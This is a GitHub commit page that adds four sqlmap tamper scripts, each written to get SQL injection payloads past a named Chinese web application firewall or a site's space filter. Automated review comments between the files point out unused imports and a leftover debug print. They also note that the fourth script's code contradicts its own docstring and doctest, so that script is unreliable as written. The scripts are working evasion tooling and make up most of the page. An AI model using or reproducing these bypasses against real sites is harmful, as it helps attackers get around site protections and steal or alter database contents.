add sqlmap bypass D盾/云锁/安全狗/空格替换换行 tamper
Mr-xn committed Nov 11, 2019
1 parent 8d87185 commit c2caaba
Showing 5 changed files with 148 additions and 0 deletions.
4 changes: 4 additions & 0 deletions README.md
Expand Up @@ -122,6 +122,10 @@
- [crt.sh证书/域名收集](./tools/crt.sh证书收集.py)
- [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan)
- [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan)
- [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py)
- [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py)
- [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py)
- [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py)

## 说明

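--- a/tools/sqlmap_bypass_D盾_tamper.py
+++ b/tools/sqlmap_bypass_D盾_tamper.py
@@ -0,0 +1,34 @@
+# coding=UTF-8
+# Desc: sqlmap_bypass_D盾_tamper
+
+from lib.core.enums import PRIORITY
+__priority__ = PRIORITY.LOW
+
+
+def dependencies():
+pass
+
+
+def tamper(payload, **kwargs):
+"""
+BYPASS Ddun
+"""
+retVal = payload
+if payload:
+retVal = ""
+quote, doublequote, firstspace = False, False, False
+for i in xrange(len(payload)):
+if not firstspace:
+if payload[i].isspace():
+firstspace = True
+retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
+continue
+elif payload[i] == '\'':
+quote = not quote
+elif payload[i] == '"':
+doublequote = not doublequote
+elif payload[i] == " " and not doublequote and not quote:
+retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
+continue
+retVal += payload[i]
+return retVal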
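Review bot: The `tamper` docstring (`BYPASS Ddun`) names a product but does not say what the function returns, so a reader has to trace the loop to find out. As far as the flattened listing shows, the first whitespace character and every later space outside single or double quotes are replaced by the fixed string `/*DJSAWW%2B%26Lt%3B%2B*/`. I would write the docstring as `"""Replace spaces outside quoted strings with one fixed inline-comment token."""`. A comment on the token line should also say that the value is a constant: every request produced with this script carries the same literal marker, which is what a log search or a WAF rule can key on.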
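--- a/tools/sqlmap_bypass_云锁_tamper.py
+++ b/tools/sqlmap_bypass_云锁_tamper.py
@@ -0,0 +1,27 @@
+# coding=UTF-8
+# Desc: sqlmap bypass 云锁 tamper
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.data import kb
+from lib.core.enums import PRIORITY
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+__priority__ = PRIORITY.LOW
+
+
+def dependencies():
+pass
+
+
+def tamper(payload, **kwargs):
+payload = payload.replace('ORDER', '/*!00000order*/')
+payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
+payload = payload.replace('CONCAT(', "CONCAT/**/(")
+payload = payload.replace("--", " */--")
+payload = payload.replace("AND", "%26%26")
+return payload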
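Review bot: Four of the imports at the top of this file are never used: `re`, `kb`, `singleTimeWarnMessage` and `DBMS` do not appear anywhere in `tamper`, which only calls `str.replace`. I would drop them and keep `from lib.core.enums import PRIORITY`. `tamper` also has no docstring; `"""Rewrite ORDER, ALL SELECT, CONCAT(, -- and AND in the payload with fixed comment-wrapped forms."""` would state what it does. The header carries the sqlmap developers' copyright notice on a file that this commit adds as new, so if the script is not taken from sqlmap the notice should be replaced with its real origin and licence.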
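--- a/tools/sqlmap_bypass_安全狗_tamper.py
+++ b/tools/sqlmap_bypass_安全狗_tamper.py
@@ -0,0 +1,24 @@
+# coding=UTF-8
+# Desc: sqlmap_bypass_安全狗_tamper
+
+from lib.core.enums import PRIORITY
+from lib.core.settings import UNICODE_ENCODING
+__priority__ = PRIORITY.LOW
+def dependencies():
+pass
+def tamper(payload, **kwargs):
+
+if payload:
+payload=payload.replace(" ","/*!*/")
+payload=payload.replace("=","/*!*/=/*!*/")
+payload=payload.replace("AND","/*!*/AND/*!*/")
+payload=payload.replace("UNION","union/*!88888cas*/")
+payload=payload.replace("#","/*!*/#")
+payload=payload.replace("USER()","USER/*!()*/")
+payload=payload.replace("DATABASE()","DATABASE/*!()*/")
+payload=payload.replace("--","/*!*/--")
+payload=payload.replace("SELECT","/*!88888cas*/select")
+payload=payload.replace("FROM","/*!99999c*//*!99999c*/from")
+print payload
+
+return payload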
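Review bot: The `print payload` line near the end of `tamper` is a leftover debug statement and I would delete it. It writes every rewritten payload to stdout, and as a Python 2 print statement it is a syntax error on Python 3, so the module cannot be imported there. `UNICODE_ENCODING` is imported from `lib.core.settings` but is not used anywhere in the visible code. `tamper` also has no docstring describing the ten `replace` calls it applies.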
@@ -0,0 +1,59 @@
# coding=UTF-8
# Desc: sqlmap_bypass_某企业建站程序过滤_tamper

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
"""
把空格替换成换行符:%0A
Replaces space character (' ') with comments '%0A'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT%0Aid%0AFROM%0Ausers'
"""

retVal = payload

if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/%OA/"
continue

elif payload[i] == '\'':
quote = not quote

elif payload[i] == '"':
doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:
retVal += "/%0A/"
continue

retVal += payload[i]

return retVal
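Review bot: The docstring and the code in `tamper` disagree about the output. The text and doctest describe `%0A` (`'SELECT%0Aid%0AFROM%0Ausers'`), while the first-whitespace branch appends `/%OA/` with a letter O and the later branch appends `/%0A/`, both wrapped in slashes. As written the doctest cannot pass and the two branches emit different strings, so the branches and the example need to be made to agree. The docstring also lists databases under "Tested against" although nothing in the commit supports that for this variant; I would rewrite it to state exactly what the function returns and drop the unverified claims. This section's file header is missing from the page, so its path is known only from the README entry.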
